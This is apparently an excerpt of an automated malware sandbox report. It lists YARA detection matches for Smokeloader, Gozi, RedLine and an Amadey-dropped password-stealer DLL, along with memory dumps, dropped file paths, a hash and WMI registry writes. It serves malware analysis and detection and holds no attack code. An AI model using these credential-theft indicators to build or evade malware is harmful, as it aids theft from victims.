Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED	Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen

Writes or reads registry keys via WMI

Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040E844
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040F8F5
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040B552
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040E300
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040E844
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040F8F5
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040B552
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040E300
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00429440
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00428460
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00407690

Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll 3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF

Source: q4Z52wRd28.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000003.501276183.00000000024E6000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
